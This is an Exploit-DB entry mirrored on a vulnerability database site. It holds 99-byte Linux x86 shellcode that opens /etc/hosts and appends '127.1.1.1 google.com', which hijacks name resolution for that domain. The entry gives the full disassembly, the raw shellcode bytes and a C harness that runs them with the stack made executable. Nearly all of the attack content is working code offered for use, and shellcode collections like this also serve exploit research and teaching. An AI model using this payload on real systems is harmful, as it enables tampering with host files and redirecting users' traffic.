Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)

🗓️ 14 Sep 2018 00:00:00Reported by Exploit-DBType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 33 Views

Linux/86 File Modification Shellcode Polymorphi

Code
/* 
    # Title: Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)
    # Date: 2018-09-13
    # Author: Ray Doyle (@doylersec)
    # Tested on: Linux/x86
    # gcc -o poly_hosts_shellcode -z execstack -fno-stack-protector poly_hosts_shellcode.c
*/

/****************************************************
Disassembly of section .text:

08048060 <_start>:
 8048060:	29 c9                	sub    ecx,ecx
 8048062:	51                   	push   ecx

08048063 <open>:
 8048063:	6a 05                	push   0x5
 8048065:	58                   	pop    eax
 8048066:	68 6f 73 74 73       	push   0x7374736f
 804806b:	68 74 63 2f 68       	push   0x682f6374
 8048070:	68 2f 2f 2f 65       	push   0x652f2f2f
 8048075:	54                   	push   esp
 8048076:	5b                   	pop    ebx
 8048077:	51                   	push   ecx
 8048078:	41                   	inc    ecx
 8048079:	b5 04                	mov    ch,0x4
 804807b:	cd 80                	int    0x80
 804807d:	93                   	xchg   ebx,eax
 804807e:	6a 04                	push   0x4
 8048080:	58                   	pop    eax

08048081 <write>:
 8048081:	68 2e 63 6f 6d       	push   0x6d6f632e
 8048086:	68 6f 67 6c 65       	push   0x656c676f
 804808b:	68 31 20 67 6f       	push   0x6f672031
 8048090:	68 31 2e 31 2e       	push   0x2e312e31
 8048095:	68 31 32 37 2e       	push   0x2e373231
 804809a:	54                   	push   esp
 804809b:	59                   	pop    ecx
 804809c:	6a 14                	push   0x14
 804809e:	5a                   	pop    edx
 804809f:	cd 80                	int    0x80

080480a1 <close>:
 80480a1:	92                   	xchg   edx,eax
 80480a2:	b0 06                	mov    al,0x6
 80480a4:	cd 80                	int    0x80

080480a6 <exit>:
 80480a6:	31 c0                	xor    eax,eax
 80480a8:	40                   	inc    eax
 80480a9:	cd 80                	int    0x80
****************************************************/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x29\xc9\x51\x6a\x05\x58\x68\x6f\x73\x74\x73\x68\x74\x63\x2f\x68\x68\x2f\x2f\x2f\x65\x54\x5b\x51\x41\xb5\x04\xcd\x80\x93\x6a\x04\x58\x68\x2e\x63\x6f\x6d\x68\x6f\x67\x6c\x65\x68\x31\x20\x67\x6f\x68\x31\x2e\x31\x2e\x68\x31\x32\x37\x2e\x54\x59\x6a\x14\x5a\xcd\x80\x92\xb0\x06\xcd\x80\x31\xc0\x40\xcd\x80";

main()
{
    printf("Shellcode Length: %d\n", strlen(code));
    int (*ret)() = (int(*)())code;
    ret();
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Sep 2018 00:00Current
0.1Low risk
Vulners AI Score0.1
linux/x86file modificationpolymorphic shellcode/etc/hosts127.1.1.1google.comexecstack.
33